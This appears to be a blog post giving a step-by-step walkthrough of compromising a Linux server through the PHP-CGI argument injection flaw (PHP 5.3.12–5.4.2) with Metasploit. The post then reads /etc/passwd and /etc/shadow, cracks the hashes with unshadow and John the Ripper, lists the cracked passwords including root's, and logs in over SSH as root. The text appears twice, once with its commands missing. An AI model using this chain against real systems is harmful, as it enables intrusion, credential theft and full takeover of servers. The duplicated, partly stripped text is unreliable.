Exploit php Injection obtain user Hashes
Hello all.
Did you still loyal to my posts ? :)
on this occasion I will show a few ways for you who likes to do penetration testing .
as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome.
at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x
Description:
When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable
to an argument injection vulnerability . This module takes advantage
of the- d flag to set php.ini directives to Achieve code execution .
(you can find the complete information when using a module that we use to type in the info)
ok, now i will show you about that :)
open your metasploit using command:
then type this command for use the module :
command:
wait, until session meterpreter was opened
okay, as seen in the picture above, meterpreter session has been opened.
*whoami (Print the user name associated with the current effective user ID)
: www-data
*id (Print user and group information for the specified USERNAME)
: uid=33(www-data) gid=33(www-data) group=33(www-data)
*who (Print information about users who are currently logged in.)
: albert tty1 Feb 21 08:48
: root pts/0 Feb 21 08:46 (:0.0)
seen that we do not get root privileges.
next, dump the password hashes for all users on a linux
out of the shell with press "Ctrl+z" at the same time, and type "y" for back to meterpreter
then type in the command "background" to return to the metasploit module
command :
session -i (Interact with the supplied session ID)
next, useing the module "hashdump" to dump the password hashes for all users on a linux
command :
You must run this module as root !
now, how do we get a dump for the password hashes for all users on a linux ?
until this stage you do not give up because we still have another way to solve it :)
now back to sessions meterpreter using command:
the next step see and copy all the contents in the file /etc/passwd using command:
then i save it with the name passwd.txt
next, see and copy all the contents in the file /etc/shadow using command:
again, i save it with the name shadow.txt
next step combining with shadow.txt and passwd.txt using unshadow command. The unshadow tool combines the passwd and shadow files so John can use them.
in this step I have discussed before, and you can learn it here http://h2-exploitation.blogspot.com/2013/09/jtr-crack-super-user-password.html
command:
hashdump : output file name
command :
The next step using the "john" to show cracked passwords [if = LEFT, then uncracked]
command:
seen in the image above there are several users and passwords that we managed to get one of them is the password "root"
finish step login using ssh (Secure Shell) port 22 (make sure the port is opened)
command :
binggo. i'm a root now =))
*id (Print user and group information for the specified USERNAME)
: uid=0(root) gid=0(root) group=0(root)
*whoami (Print the user name associated with the current effective user ID)
: root
good luck and enjoy :)
Regards
Hidemichi-Hiroyuki a.k.a [H2]
Did you still loyal to my posts ? :)
on this occasion I will show a few ways for you who likes to do penetration testing .
as you know , a penetration testing was not only stopped when a problem to them , but on this occasion I will share some of these issues so that we can overcome.
at this stage I would try to exploit the existing decrepitude on the CGI ( Common Gateway Interface ) for PHP ( Personal Home Page ) 5.x.x
Description:
When run as a CGI , PHP 5.3.12 and up to version 5.4.2 is vulnerable
to an argument injection vulnerability . This module takes advantage
of the- d flag to set php.ini directives to Achieve code execution .
(you can find the complete information when using a module that we use to type in the info)
ok, now i will show you about that :)
open your metasploit using command:
# msfconsole
then type this command for use the module :
command:
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > set RHOST xxx.xxx.xxx (target ip addr)
msf exploit(php_cgi_arg_injection) > exploit
msf exploit(php_cgi_arg_injection) > set RHOST xxx.xxx.xxx (target ip addr)
msf exploit(php_cgi_arg_injection) > exploit
wait, until session meterpreter was opened
okay, as seen in the picture above, meterpreter session has been opened.
*whoami (Print the user name associated with the current effective user ID)
: www-data
*id (Print user and group information for the specified USERNAME)
: uid=33(www-data) gid=33(www-data) group=33(www-data)
*who (Print information about users who are currently logged in.)
: albert tty1 Feb 21 08:48
: root pts/0 Feb 21 08:46 (:0.0)
seen that we do not get root privileges.
next, dump the password hashes for all users on a linux
out of the shell with press "Ctrl+z" at the same time, and type "y" for back to meterpreter
then type in the command "background" to return to the metasploit module
command :
meterpreter > background
session -i (Interact with the supplied session ID)
next, useing the module "hashdump" to dump the password hashes for all users on a linux
command :
msf > use post/linux/gather/hashdump
msf post(hashdump) > show options
msf post(hashdump) > set SESSION 1 (choose your session)
msf post(hashdump) > show options
msf post(hashdump) > set SESSION 1 (choose your session)
msf post(hashdump) > run
You must run this module as root !
now, how do we get a dump for the password hashes for all users on a linux ?
until this stage you do not give up because we still have another way to solve it :)
now back to sessions meterpreter using command:
msf > sessions -i 1 (back to sessions 1)
meterpreter > shell
meterpreter > shell
the next step see and copy all the contents in the file /etc/passwd using command:
cat /etc/passwd
then i save it with the name passwd.txt
next, see and copy all the contents in the file /etc/shadow using command:
cat /etc/shadow
again, i save it with the name shadow.txt
next step combining with shadow.txt and passwd.txt using unshadow command. The unshadow tool combines the passwd and shadow files so John can use them.
in this step I have discussed before, and you can learn it here http://h2-exploitation.blogspot.com/2013/09/jtr-crack-super-user-password.html
command:
unshadow passwd.txt shadow.txt > hashdump.txt
hashdump : output file name
command :
cat hashdump.txt
The next step using the "john" to show cracked passwords [if = LEFT, then uncracked]
command:
john --show hashdump.txt
seen in the image above there are several users and passwords that we managed to get one of them is the password "root"
username password
root abcde
sys batman
klog 123456789
msfadmin msfadmin
postgress postgress
user user
service service
albert albert
finish step login using ssh (Secure Shell) port 22 (make sure the port is opened)
command :
ssh root@xxx.xxx.xxx
binggo. i'm a root now =))
*id (Print user and group information for the specified USERNAME)
: uid=0(root) gid=0(root) group=0(root)
*whoami (Print the user name associated with the current effective user ID)
: root
good luck and enjoy :)
Regards
Hidemichi-Hiroyuki a.k.a [H2]
cases which method should be used
ReplyDelete